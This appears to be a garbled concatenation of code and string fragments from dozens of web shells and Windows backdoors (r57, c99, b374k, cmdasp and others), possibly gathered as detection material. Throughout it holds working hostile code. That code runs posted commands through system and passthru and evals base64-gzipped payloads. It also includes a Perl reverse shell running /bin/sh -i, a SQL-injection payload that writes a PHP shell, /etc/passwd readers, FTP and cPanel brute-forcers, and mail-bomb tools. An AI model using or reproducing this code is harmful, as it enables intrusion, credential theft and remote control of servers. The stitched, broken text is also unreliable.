$nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name 